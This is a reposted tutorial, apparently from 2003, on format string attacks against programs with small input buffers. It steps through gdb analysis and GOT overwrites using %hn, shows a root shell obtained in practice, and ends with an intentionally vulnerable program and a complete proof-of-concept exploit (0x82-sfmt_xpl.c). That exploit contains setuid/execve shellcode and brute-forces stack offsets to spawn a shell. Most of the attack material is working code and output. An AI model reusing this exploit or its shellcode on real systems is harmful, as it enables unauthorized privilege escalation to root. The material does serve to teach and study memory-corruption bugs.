`
lovnet
  • 浏览: 6727168 次
  • 性别: Icon_minigender_1
  • 来自: 武汉
文章分类
社区版块
存档分类
最新评论

Small buffer format string attack

阅读更多

Small buffer format string attack

Author:szoahc@hotmail.com

=======================================================================================
Title: Small buffer format string attack

Author : dong-hun you (Xpl017Elz) in INetCop <szoahc@hotmail.com>
Home: http://x82.inetcop.org & http://x82.i21c.net

Rough English Translation by KF <dotslash@snosoft.com>
Home: http://www.snosoft.com & http://www.secnetops.biz

Greets: INetCop, KF, Snosoft
=======================================================================================

0x00. Overview
0x01. Training
0x02. Small buffer format string attack


0x00. Overview

There are several documents currently on the internet that describe format string attacks.
This document will explain a simple method that you can use when you are exploiting a format
string with limited buffer space.


0x01. Training

The following code contains an exploitable heap based format string vulnerability.
In order to understand the following text, you must be aware of the `$-flag' style format string.

--- test1.c ----------------------------------------------------------------------
int main(int argc, char *argv[])
{
char *x=(char *)malloc(40);
strncpy(x,argv[1],40);
printf(x);
printf("\n");
}
----------------------------------------------------------------------------------

$ ./vuln %x%x%x
8049770bfffdb68400311eb
$

0x08049770 is a heap variable address that was declared through malloc.
This variable stores the "user input" for example "%x%x%x".

$ gdb -q vuln
(gdb) br *main+70
Breakpoint 1 at 0x804847e
(gdb) r %x%x%x
Starting program: /tmp/vuln %x%x%x
8049770bfffdb68400311eb

Breakpoint 1, 0x804847e in main ()
(gdb) x/8 0x08049770
0x8049770: 0x78257825 0x00007825 0x00000000 0x00000000
0x8049780: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)

If that variable is stored on the heap exploitation becomes more difficult.
The reason is because the format string "%x" can not easily find an address
in the heap. However, if the inputed data is stored to stack, it's easy to find.
In our example the "user input" is stored on the stack. We can confirm this if we
analyze further. You will notice the string is near the environment variables that
were loaded by the shell.

...
0xbfffdc97: "i586"
0xbfffdc9c: "/tmp/vuln"
0xbfffdca6: "%x%x%x" <- here.
0xbfffdcad: "LESSOPEN=|lesspipe.sh %s"
0xbfffdcc7: "QT_HANFONT=-*-kodig-medium-r-normal--12-*-ksc5601.1987-0,-*-kodig-medium-r-normal--14-*-ksc5601.1987-0,-*-kodig-medium-r-normal--16-*-ksc5601.1987-0,-*-kodig-medium-r-normal--18-*-ksc5601.1987-0,-*-ko"...
(gdb)
0xbfffdd8f: "dig-medium-r-normal--20-*-ksc5601.1987-0,-*-kodig-medium-r-normal--24-*-ksc5601.1987-0"
0xbfffdde6: "QT_KEYBOARD=2"
0xbfffddf4: "HISTSIZE=1000"
...

As you can see we are able to find "%x%x%x".
We need to store retloc's value at 0xbfffdca6, then we can reach it through $-flag or "%8x%8x%8x%8x..".
So, even if the contents of the above mentioned variable are stored to heap, we can still manage to exploit the problem.
The position of address value you need to refer to can be guessed or you can find it by doing the following.

$ ./vuln AAAA%88\$x%89\$x%90\$x
AAAA414141412438382539382578
$ gdb -q vuln
(gdb) disass printf
Dump of assembler code for function printf:
0x8048364 <printf>: jmp *0x8049510
0x804836a <printf+6>: push $0x20
0x804836f <printf+11>: jmp 0x8048314 <_init+48>
End of assembler dump.
(gdb)

If you do testing in gdb, in some cases the addresses are different from if you only ran from the shell prompt.
Either way, you could test your final format code as following.

$ gdb -q vuln
(gdb) r `printf "\x10\x95\x04\x08\x12\x95\x04\x08"`%16697x%91\$hn%00257x%90\$hnAA
Starting program: /tmp/vuln `printf "\x10\x95\x04\x08\x12\x95\x04\x08"`%16697x%91\$hn%00257x%90\$hnAA

...

Program received signal SIGSEGV, Segmentation fault.
0x41414242 in ?? ()
(gdb)

The Value that caused 0x4141 is %16697x (decimal). This value is first stored at 0x08049512.
And then, the value 0x4242 is stored %257x at 0x08049510.
Using this method we store the value 0x41414242 in GOT.

Above, we used the $-flag to find our "user input".
One problem I failed to mention was that we are working with a small buffer and we do not have room for our shellcode,
How does it do exploit?


0x02. Small buffer format string attack

First, let's understand how a format string can find an address.
This may be simple information that you know already.

int main()
{
char string[]="It's test!";
char format_str[]="\x41\x41\x41\x41%s\n";
printf(format_str);
}

0x41414141 should store the address value that points to where the variable string[] is allocated.
Through gdb, can confirm that string is to 0x8048470.

(gdb) x/s 0x8048470
0x8048470 <_IO_stdin_used+4>: "It's test!"
(gdb)

Let's substitute this address in the above sample code by writing a simple patch.

$ cat > patch
--- test.c Tue Jun 3 20:47:51 2003
+++ test.patch.c Tue Jun 3 20:48:02 2003
@@ -1,6 +1,6 @@
int main()
{
char string[]="It's test!";
- char format_str[]="\x41\x41\x41\x41%s\n";
+ char format_str[]="\x70\x84\x04\x08%s\n";
printf(format_str);
}
^C
$ patch < patch
patching file `test.c'
$ gcc -o test test.c && ./test
It's test!
$

When the '%s' format string is applied to the address 0x08048470 it would display the contents of that address.
An attacker would rather change a memory address by using (%hn or %n) to GOT, .dtors, or a specific return address.

As we already showed, if attacker's input exists on the stack it can be reached through a format string like `$-flag'
or `%8x'.

If the proper return address is stored on the stack, you may not need to put your own return address value in front
of the format string. In other words your own GOT, .dtors, return address (short size 8byte, general size 16byte, long
size 32byte) that is usually placed in front of the format string may not needed.

As an attacker you might ask if the value that you use for your own return address can point to anywhere?
For local exploits one approach is to use environment variables to store the address. With values stored in the
environment you can simply reference them via the `$-flag'.

When attacking one other thing you need to know is the conversion for your shellcode address into decimal.

To finish us I will talk about the small buffer space I mentioned above. The buffer space is only 30bytes.

Hmmm ... Instead of placing the return address in an environment variable you can also place it in arguments of the
program. If the format string is placed in argument 0 it will be stored on the stack and it will be stored closer in
distance to the general environment variables. This can be useful in small buffer space.

First we will try the exploit using an environment variable.
After execute eggshell,

# ./eggshell

Using shellcode address: 0xbffff9a8

bash# export A=`perl -e 'print "\x10\x95\x04\x08\x12\x95\x04\x08"x20'`

Stored GOT address in environment variable of `A'.

bash# gdb -q vuln
(gdb) r %49151x%261\$hn%15641x%262\$hn
Starting program: /tmp/vuln %49151x%261\$hn%15641x%262\$hn

...
Program received signal SIGTRAP, Trace/breakpoint trap.
0x40001780 in _start () at rtld.c:142
142 rtld.c: No such file or directory.
(gdb) c
Continuing.
bash# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
bash# exit
exit

Program exited normally.
(gdb) q
bash#

You can also as stated above add the return address with the format string.
This time we try the exploit through an argument rather than an environment variable.

bash-2.04# cat test.c
main() {
execl("./vuln","\xb8\x95\x04\x08\xba\x95\x04\x08","%49151x%97$hn%14775x%96$hn",0);
}
bash-2.04# ./test
...
...
...
sh-2.04#

WoW, by Inserting the GOT address code to the first `argument 0th' included with the (%96$x%97$x)
the minimum dimensions of assailable buffer space becomes 26 bytes.

Based on this proof show above, format string exploits are possible in a minimum of 26 bytes of buffer
space. If this occurs in a remote environment, or don't store value in environment variable,
you may make use of the stack that is used by the program. (For example, program that require user's
input)

I prepared some exploit code so that you can exploit this conveniently on Linux (My box runs RedHat).
One method is to use an environment variable, and the other method is to use an argument.
Both methods, can exploit in small buffer environment that is fewer than 30 bytes.

Usage example: --

[root@xpl017elz /tmp]# chmod 6755 vuln
[root@xpl017elz /tmp]# su x82
[x82@xpl017elz /tmp]$ ./0x82-sfmt_xpl

Proof of Concept 26byte small buffer format string exploit.

[+] GOT (printf) address: 0x8049510
[+] Shellcode address: 0xbfffffb7
[+] Attack mode: Environment variable.
[+] flag and pad brute-force mode:
........................................................................

Found it!!!
[+] Pad: 3
[+] Flag: 72
[+] Attack format string: %49151x%73$hn%16312x%72$hn
[+] code size: 26byte

Input [ENTER]:

...

8049770

...
...

bash#

--
Thank you.


-- Appending code --

=========== vuln.c ===========
/*
**
** code name: vuln.c
** description: Weak program to format string attack.
**
*/

int main(int argc, char *argv[])
{
char *x0x=(char *)malloc(26);
strncpy(x0x,argv[1],26);
printf(x0x);
printf("\n");
}

=========== eoc ==============

====== 0x82-sfmt_xpl.c =======
/*
**
** code name: 0x82-sfmt_xpl.c
** description: Proof of Concept 26byte small buffer format string exploit
**
*/

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/stat.h>

#define OBJDUMP "/usr/bin/objdump"
#define GREP "/bin/grep"
#define AWK "/bin/awk"
#define TARGET "./vuln"
#define d_size (0x000000ff)
#define s_size (sizeof(int)*4)
#define df_flg (0x0000012c)

int scs=(0);
int arg=(0);
int flag=(1);
int m_pad=(4),pad;
int jnk_one,jnk_two;
u_long got,shr;
char tg_f_nm[(d_size)]=(TARGET);
char shellcode[]=
"\x90\x40\x90\x40\x90\x40\x90\x40\x90\x40\x90\x40\x90\x40\x90\x40"
"\x90\x40\x90\x40\x90\x40\x90\x40\x90\x40\x90\x40\x90\x40\x90\x40"
"\x90\x40\x90\x40\x90\x40\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80"
"\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52"
"\x53\x89\xe1\x8d\x42\x0b\xcd\x80";

u_long __get_dtors(char *f_name);
void __mk_str_code(char *env_arg_atk,char *exec_t,char *got_buf);
void tl_exploit_f(int fd,char *env_arg_atk,char *exec_t);
void cpl_usage(char *f_name);
void banrl();

int main(int argc,char *argv[])
{
int whgl;
pid_t pid;
struct stat s_t;
char exec_t[(d_size)];
char env_arg_atk[(d_size)];
char got_buf[(s_size)];

memset((char *)got_buf,0,sizeof(got_buf));
memset((char *)env_arg_atk,0,sizeof(env_arg_atk));
memset((char *)exec_t,0,sizeof(exec_t));

(void)banrl();
while((whgl=getopt(argc,argv,"M:m:T:t:F:f:P:p:Hh"))!=EOF)
{
extern char *optarg;
switch(whgl)
{
case 'M':
case 'm':
if((arg=atoi(optarg))>1)
{
(void)cpl_usage(argv[0]);
}
break;

case 'T':
case 't':
memset((char *)tg_f_nm,0,sizeof(tg_f_nm));
strncpy(tg_f_nm,optarg,sizeof(tg_f_nm)-1);
break;

case 'F':
case 'f':
if((flag=atoi(optarg))>(df_flg))
{
fprintf(stderr," [-] $-flag value error.\n\n");
exit(-1);
}
break;

case 'P':
case 'p':
m_pad=atoi(optarg);
break;

case 'H':
case 'h':
(void)cpl_usage(argv[0]);
break;

case '?':
(void)cpl_usage(argv[0]);
break;
}
}

if((stat((tg_f_nm),&s_t)!=0))
{
fprintf(stderr," [-] target program path: %s not found.\n\n",(tg_f_nm));
exit(-1);
}
got=(__get_dtors(tg_f_nm));
shr=((0xbfffffff)-(strlen(shellcode)));
if((!got))
{
fprintf(stdout," [-] GOT (printf) address getting failed.\n\n");
exit(-1);
}

fprintf(stdout," [+] GOT (printf) address: %p\n",got);
fprintf(stdout," [+] Shellcode address: %p\n",shr);
fprintf(stdout," [+] Attack mode: %s.\n", (arg)?"Argument":"Environment variable");

got_buf[0]=got_buf[4]=(got&0x000000ff)>>0;
got_buf[1]=got_buf[5]=(got&0x0000ff00)>>8;
got_buf[2]=got_buf[6]=(got&0x00ff0000)>>16;
got_buf[3]=got_buf[7]=(got&0xff000000)>>24;
got_buf[4]+=(0x2);
jnk_one=((shr&0xffff0000)>>16);
jnk_two=((shr&0x0000ffff)>>0)-(jnk_one);

fprintf(stdout," [+] flag and pad brute-force mode:\n ");
for(;flag<=(df_flg);flag++)
{
fprintf(stdout,".");
fflush(stdout);
for(pad=0;pad<=(m_pad);pad++)
{
int out[2],in[2];
(void)__mk_str_code(env_arg_atk,exec_t,got_buf);
if(pipe(out)==-1)
{
perror(" [-] pipe (out) error");
exit(-1);
}
if(pipe(in)==-1)
{
perror(" [-] pipe (in) error");
exit(-1);
}
switch(pid=fork())
{
case -1:
perror(" [-] fork() error");
break;

case 0:
close(out[0]);
close(in[1]);
dup2(out[1],STDOUT_FILENO);
dup2(in[0],STDIN_FILENO);
{
char *test_emt[3];
if(!arg)
{
test_emt[0]=(env_arg_atk);
test_emt[1]=(shellcode);
test_emt[2]=(NULL);
execle(tg_f_nm,tg_f_nm,exec_t,NULL,test_emt);
}
else
{
test_emt[0]=(shellcode);
test_emt[1]=(NULL);
execle(tg_f_nm,env_arg_atk,exec_t,NULL,test_emt);
}
}
break;

default:
close(out[1]);
close(in[0]);
(void)tl_exploit_f(out[0],env_arg_atk,exec_t);
close(out[0]);
close(in[1]);
break;
}
wait(&pid);
}
}
if(!scs)
{
fprintf(stdout,"\n [-] Sorry, GOT address not found.\n\n");
exit(-1);
}
}

u_long __get_dtors(char *f_name)
{
char st_exec[(d_size)*2];
FILE *fp;
char fd_addr[(s_size)];

memset((char *)st_exec,0,sizeof(st_exec));
snprintf(st_exec,sizeof(st_exec)-1,
// objdump -R ./vuln | grep printf
"%s -R %s"
" | %s printf"
" | %s -F\" \""
" '{print $1}'",
(OBJDUMP),f_name,(GREP),(AWK));
if((fp=(FILE *)popen(st_exec,"r"))==NULL)
{
perror(" [-] popen() error");
exit(-1);
}
memset((char *)fd_addr,0,sizeof(fd_addr));
fgets(fd_addr,sizeof(fd_addr)-1,fp);
pclose(fp);

return(strtoul(fd_addr,NULL,sizeof(fd_addr)));
}

void __mk_str_code(char *env_arg_atk,char *exec_t,char *got_buf)
{
char pad_t[(s_size)];
int cl_pad=(pad);
memset((char *)pad_t,0,sizeof(pad_t));

while(cl_pad)
{
cl_pad--;
pad_t[cl_pad]='+';
}
memset((char *)env_arg_atk,0,(d_size));
snprintf(env_arg_atk,(d_size)-1,"%s%s",got_buf,pad_t);
memset((char *)exec_t,0,(d_size));
snprintf(exec_t,(d_size)-1,"0000000%%%d$xx0000000%%%d$xx",flag,flag+1);
}

void tl_exploit_f(int fd,char *env_arg_atk,char *exec_t)
{
char *r_emt[3];
char rslt[(d_size)];
char rslt_buf[(d_size)];
memset((char *)rslt,0,sizeof(rslt));
memset((char *)rslt_buf,0,sizeof(rslt_buf));

read(fd,rslt,sizeof(rslt)-1);
snprintf(rslt_buf,sizeof(rslt_buf)-1,"0000000%xx0000000%xx",got,got+2);

if(strstr(rslt,rslt_buf))
{
scs+=(1);
fprintf(stdout,"\n
Found it!!!\n");
fprintf(stdout," [+] Pad: %d\n",pad);
fprintf(stdout," [+] Flag: %d\n",flag);
memset((char *)exec_t,0,(d_size));
snprintf(exec_t,(d_size)-1,"%%%dx%%%d$hn%%%dx%%%d$hn",jnk_one,flag+1,jnk_two,flag);
fprintf(stdout," [+] Attack format string: %s\n",exec_t);
fprintf(stdout," [+] code size: %dbyte\n",strlen(exec_t));
fprintf(stdout,"
Input [ENTER]: ");
fflush(stdout);
getchar();

if(!arg)
{
r_emt[0]=(env_arg_atk);
r_emt[1]=(shellcode);
r_emt[2]=(NULL);
execle(tg_f_nm,tg_f_nm,exec_t,NULL,r_emt);
}
else
{
r_emt[0]=(shellcode);
r_emt[1]=(NULL);
execle(tg_f_nm,env_arg_atk,exec_t,NULL,r_emt);
}
}
}

void cpl_usage(char *f_name)
{
fprintf(stdout," Usage: %s -option argument\n\n",f_name);
fprintf(stdout,"\t -m [target num] : Select exploit mode. (default: %d)\n",arg);
fprintf(stdout,"\t\t\t{0} : Environment variable.\n");
fprintf(stdout,"\t\t\t{1} : Argument.\n");
fprintf(stdout,"\t -t [target path] : target program path. (default: %s)\n",tg_f_nm);
fprintf(stdout,"\t -f [flag num] : $-flag number. (default: %d)\n",flag);
fprintf(stdout,"\t -p [pad num] : max pad number. (default: %d)\n",m_pad);
fprintf(stdout,"\t -h : help information.\n\n");
fprintf(stdout," Example: %s -t%s -m%d\n\n",f_name,tg_f_nm,arg);
exit(-1);
}

void banrl()
{
fprintf(stdout,"\n Proof of Concept 26byte small buffer format string exploit.\n\n");
}

=========== eoc ==============

分享到:
评论

相关推荐

    albert_small_zh_googlealbert_small_zh_google

    albert_small_zh_googlealbert_small_zh_googlealbert_small_zh_googlealbert_small_zh_googlealbert_small_zh_googlealbert_small_zh_googlealbert_small_zh_googlealbert_small_zh_googlealbert_small_zh_...

    不知道recv大小时如何设置buffer大小接收图像

    关于recv函数buffer大小的设置,当不知道数据长度时如何设置buffer长度,以及buffer长度对实际接收长度的影响。

    NvmExpressDxe_Small_NvmExpressDxe_Small_

    NvmExpressDxe_Small broooo

    small.img镜像个人专用

    small.img small.img small.img small.img small.img small.img

    Light scattering by small particles (part 2 pdf format)

    Title: Light scattering by small particles Author(s): H.C. Van de Hulst. Date: 1957 Publisher: Wiley Pages: 470 Subject: Optics , Scattering Call #: QC431:V3 Take a Virtual Look at the Shelves ...

    Start Small, Stay Small

    着眼小众市场,程序员的微型创业项目指南Start Small, Stay Small.pdf

    HtmlFormatter:一个纯净的Java便利类,用于将String格式化为HTML字符串

    HtmlFormatter 一个纯Java便利类,用于将String格式化为Html String...// ----- output -----// &lt;small&gt;This is a small string&lt;/small&gt;.bold()或.strong() input = "This is a bold string";result = HtmlFormatt

    Small basic试题及参考答案

    Small basiC 学习练习试题及参考答案

    字符串包装,方便使用

    方便操作string字符串,SmallBuffer类似C#中stringbuilder

    Small Basic

    By providing a small and easy to learn programming language in a friendly and inviting development environment, Small Basic makes programming a breeze. Ideal for kids and adults alike, Small Basic ...

    Start Small, Stay Small: A Developer's Guide to Launching a Startup

    Start Small, Stay Small is a step-by-step guide to launching a self-funded startup. If you're a desktop, mobile or web developer, this book is your blueprint to getting your startup off the ground ...

    small memory software

    small memory software

    small RTOS51源码_陈明计.rar

    small RTOS51源码_陈明计.rar Small RTOS v1.12.2.zip Small RTOS v1.20.3.zip Small RTOS V1.51 smallrtos.zip

    C++string类仿写

    C++编写的类似于string类,自己改动实现相关库函数功能 C++的一般编译器都定义和封装了字符串功能,请模仿定义string类的实现,可以实现并支持如下功能: (1)string s = “rubbish大学”; (2)string t = s; ...

    mars-small128.zip

    DeepSort需要使用的目标跟踪模型。里面包含了mars-small128.meta,mars-small128.pb,mars-small128.ckpt-68577,mars-small128.ckpt-68577.meta四个文件。

    Deep SORT 所需的 mars-small128系列文件

    Deep SORT 所需的 mars-small128系列文件。mars-small128.ckpt-68577;mars-small128.ckpt-68577.meta;mars-small128.pb;MOT16_POI_test;MOT16_POI_train 包括deep-sort中resource目录下的资源,弥补github缺失...

    Small RTOS(51)

    Small RTOS(51) 1.11v 使用手册 概述: Small RTOS是一个源代码公开的多任务实时操作系统,Small RTOS 51 是其在8051系列处理器上的移植(使用keil c51)。Small RTOS可以简化那 些复杂而且时间要求严格的工程的...

    微软 Small Basic 简体中文版说明书

    微软发布的Small Basic是一款针对儿童的免费编程语言。不像Scratch和Alice,这款工具属于 Small Basic程序界面 “无编码”环境,本质上讲是一个简略版本的BASIC语言。该语言脱胎于传统的BASIC语言,但是基于.Net开发...

    fasthan模型下载;small

    small;fasthan模型下载;small;fasthan模型下载;small;fasthan模型下载;small;fasthan模型下载;small;fasthan模型下载;small;fasthan模型下载;small;fasthan模型下载;small;fasthan模型下载;small;...

Global site tag (gtag.js) - Google Analytics